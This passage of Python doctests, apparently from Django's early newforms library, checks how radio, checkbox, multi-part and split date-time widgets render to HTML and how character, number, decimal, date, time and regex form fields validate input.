<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>
The render() method returns a RadioFieldRenderer object, whose str() is a <ul>.
You can manipulate that object directly to customize the way the RadioSelect
is rendered.
>>> w = RadioSelect()
>>> r = w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> for inp in r:
...     print inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
>>> for inp in r:
...     print '%s<br />' % inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />
>>> for inp in r:
...     print '<p>%s %s</p>' % (inp.tag(), inp.choice_label)
<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>
>>> for inp in r:
...     print '%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked())
beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False
A RadioFieldRenderer object also allows index access to individual RadioInput
objects.
>>> w = RadioSelect()
>>> r = w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> print r[1]
<label><input type="radio" name="beatle" value="P" /> Paul</label>
>>> print r[0]
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
>>> r[0].is_checked()
True
>>> r[1].is_checked()
False
>>> r[1].name, r[1].value, r[1].choice_value, r[1].choice_label
('beatle', u'J', u'P', u'Paul')
>>> r[10]
Traceback (most recent call last):
...
IndexError: list index out of range
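The combination of iteration and index access seen above can be sketched with __iter__ and __getitem__; ChoiceRenderer and its attributes are illustrative names, not Django's RadioFieldRenderer implementation:

```python
# Indexing renders one labeled input; iteration reuses indexing, and an
# out-of-range index propagates IndexError from the underlying list.
class ChoiceRenderer:
    def __init__(self, name, value, choices):
        self.name, self.value, self.choices = name, value, choices

    def __getitem__(self, idx):
        choice_value, choice_label = self.choices[idx]  # IndexError past the end
        checked = ' checked="checked"' if str(choice_value) == str(self.value) else ''
        return '<label><input%s type="radio" name="%s" value="%s" /> %s</label>' % (
            checked, self.name, choice_value, choice_label)

    def __iter__(self):
        for i in range(len(self.choices)):
            yield self[i]

r = ChoiceRenderer('beatle', 'J', [('J', 'John'), ('P', 'Paul')])
```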
# Unicode choices are correctly rendered as HTML
>>> w = RadioSelect()
>>> unicode(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]))
u'<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# Attributes provided at instantiation are passed to the constituent inputs
>>> w = RadioSelect(attrs={'id':'foo'})
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# Attributes provided at render-time are passed to the constituent inputs
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id':'bar'})
<ul>
<li><label><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# CheckboxSelectMultiple Widget ###############################################
>>> w = CheckboxSelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
The values are compared to the choices via str(), so numbers and strings match:
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
...     for i in range(5):
...         yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# MultiWidget #################################################################
>>> class MyMultiWidget(MultiWidget):
...     def decompress(self, value):
...         if value:
...             return value.split('__')
...         return ['', '']
...     def format_output(self, rendered_widgets):
...         return u'<br />'.join(rendered_widgets)
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
>>> w.render('name', ['john', 'lennon'])
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon')
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon', attrs={'id':'foo'})
u'<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
>>> w.render('name', ['john', 'lennon'])
u'<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />'
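The render flow above can be sketched in plain Python under the same decompress contract: a non-list value is decompressed into a list, and each sub-widget renders its slice under a name_<i> suffix. render_multi and render_sub are illustrative helpers, not Django API:

```python
# Decompress a compressed value, then render one sub-widget per part.
def render_multi(name, value, decompress, render_sub):
    if not isinstance(value, list):
        value = decompress(value)
    parts = []
    for i, v in enumerate(value):
        parts.append(render_sub('%s_%d' % (name, i), v))
    return '<br />'.join(parts)

decompress = lambda v: v.split('__') if v else ['', '']
render_sub = lambda n, v: '<input type="text" name="%s" value="%s" />' % (n, v)
html = render_multi('name', 'john__lennon', decompress, render_sub)
```

A list value and its compressed form render identically, mirroring the two w.render('name', ...) calls above.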
# SplitDateTimeWidget #########################################################
>>> w = SplitDateTimeWidget()
>>> w.render('date', '')
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', None)
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
>>> w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)])
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
You can also pass 'attrs' to the constructor. In this case, the attrs will be
included on both widgets.
>>> w = SplitDateTimeWidget(attrs={'class': 'pretty'})
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />'
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.newforms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
    required -- Boolean that specifies whether the field is required.
                True by default.
    widget -- A Widget class, or instance of a Widget class, that should be
              used for this Field when displaying it. Each Field has a default
              Widget that it'll use if you don't specify this. In most cases,
              the default widget is TextInput.
    label -- A verbose name for this field, for use in displaying this field in
             a form. By default, Django will use a "pretty" version of the form
             field name, if the Field is part of a Form.
    initial -- A value to use in this Field's initial display. This value is
               *not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
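The clean() contract described above can be sketched in a stripped-down, standalone form; SimpleCharField and this ValidationError are simplified illustrations, not Django's implementation:

```python
# clean() either raises ValidationError or returns the cleaned value.
class ValidationError(Exception):
    def __init__(self, messages):
        self.messages = messages

class SimpleCharField:
    def __init__(self, required=True, max_length=None):
        self.required, self.max_length = required, max_length

    def clean(self, value):
        if value in (None, ''):
            if self.required:
                raise ValidationError([u'This field is required.'])
            return u''
        value = str(value)  # coerce non-strings, as CharField coerces to text
        if self.max_length is not None and len(value) > self.max_length:
            raise ValidationError(
                [u'Ensure this value has at most %d characters.' % self.max_length])
        return value

f = SimpleCharField(max_length=10)
```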
# CharField ###################################################################
>>> f = CharField()
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
>>> f = CharField(required=False)
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
u''
>>> f.clean('')
u''
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
CharField accepts an optional max_length parameter:
>>> f = CharField(max_length=10, required=False)
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters.']
CharField accepts an optional min_length parameter:
>>> f = CharField(min_length=10, required=False)
>>> f.clean('')
u''
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
>>> f = CharField(min_length=10, required=True)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
# IntegerField ################################################################
>>> f = IntegerField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f = IntegerField(required=False)
>>> f.clean('')
>>> repr(f.clean(''))
'None'
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
IntegerField accepts an optional max_value parameter:
>>> f = IntegerField(max_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
1
>>> f.clean(10)
10
>>> f.clean(11)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
>>> f.clean('10')
10
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
IntegerField accepts an optional min_value parameter:
>>> f = IntegerField(min_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
min_value and max_value can be used together:
>>> f = IntegerField(min_value=10, max_value=20)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
>>> f.clean(20)
20
>>> f.clean(21)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 20.']
# FloatField ##################################################################
>>> f = FloatField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1.0
>>> isinstance(f.clean('1'), float)
True
>>> f.clean('23')
23.0
>>> f.clean('3.14')
3.1400000000000001
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
1.0
>>> f.clean(' 1.0')
1.0
>>> f.clean(' 1.0 ')
1.0
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = FloatField(required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
1.0
FloatField accepts min_value and max_value just like IntegerField:
>>> f = FloatField(max_value=1.5, min_value=0.5)
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
1.5
>>> f.clean('0.5')
0.5
# DecimalField ################################################################
>>> f = DecimalField(max_digits=4, decimal_places=2)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
Decimal("1")
>>> isinstance(f.clean('1'), Decimal)
True
>>> f.clean('23')
Decimal("23")
>>> f.clean('3.14')
Decimal("3.14")
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
Decimal("1.0")
>>> f.clean(' 1.0')
Decimal("1.0")
>>> f.clean(' 1.0 ')
Decimal("1.0")
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 digits before the decimal point.']
>>> f = DecimalField(max_digits=4, decimal_places=2, required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
Decimal("1")
DecimalField accepts min_value and max_value just like IntegerField:
>>> f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
Decimal("1.5")
>>> f.clean('0.5')
Decimal("0.5")
# DateField ###################################################################
>>> import datetime
>>> f = DateField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.date(2006, 10, 25)
>>> f.clean('2006-10-25')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/2006')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/06')
datetime.date(2006, 10, 25)
>>> f.clean('Oct 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('2006-4-31')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('200a-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('25/10/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = DateField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
DateField accepts an optional input_formats parameter:
>>> f = DateField(input_formats=['%Y %m %d'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean('2006 10 25')
datetime.date(2006, 10, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/2006')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
# TimeField ###################################################################
>>> import datetime
>>> f = TimeField()
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('14:25')
datetime.time(14, 25)
>>> f.clean('14:25:59')
datetime.time(14, 25, 59)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean('1:24 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
TimeField accepts an optional input_formats parameter:
>>> f = TimeField(input_formats=['%I:%M %p'])
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('4:25 AM')
datetime.time(4, 25)
>>> f.clean('4:25 PM')
datetime.time(16, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('14:30:45')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
# DateTimeField ###############################################################
>>> import datetime
>>> f = DateTimeField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.datetime(2006, 10, 25, 14, 30, 59)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.datetime(2006, 10, 25, 14, 30, 59, 200)
>>> f.clean('2006-10-25 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('2006-10-25 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('2006-10-25 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('2006-10-25')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('10/25/2006 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('10/25/2006 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/2006 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/2006')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('10/25/06 14:30:45')
datetime.datetime(2006, 10, 25, 14, 30, 45)
>>> f.clean('10/25/06 14:30:00')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/06 14:30')
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean('10/25/06')
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
>>> f.clean('2006-10-25 4:30 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
DateTimeField accepts an optional input_formats parameter:

>>> f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.datetime(2006, 10, 25, 0, 0)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.datetime(2006, 10, 25, 14, 30)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.datetime(2006, 10, 25, 14, 30, 59)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.datetime(2006, 10, 25, 14, 30, 59, 200)
>>> f.clean('2006 10 25 2:30 PM')
datetime.datetime(2006, 10, 25, 14, 30)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25 14:30:45')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date/time.']
>>> f = DateTimeField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
# RegexField ##################################################################
>>> f = RegexField('^\d[A-F]\d$')
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean(' 2A2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('2A2 ')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = RegexField('^\d[A-F]\d$', required=False)
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('')
u''
Alternatively, RegexField can take a compiled regular expression:
>>> f = RegexField(re.compile('^\d[A-F]\d$'))
>>> f.clean('2A2')
u'2A2'
>>> f.clean('3F3')
u'3F3'
>>> f.clean('3G3')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean(' 2A2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('2A2 ')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
RegexField takes an optional error_message argument:
>>> f = RegexField('^\d\d\d\d$', error_message='Enter a four-digit number.')
>>> f.clean('1234')
u'1234'
>>> f.clean('123')
Traceback (most recent call last):
...
ValidationError: [u'Enter a four-digit number.']
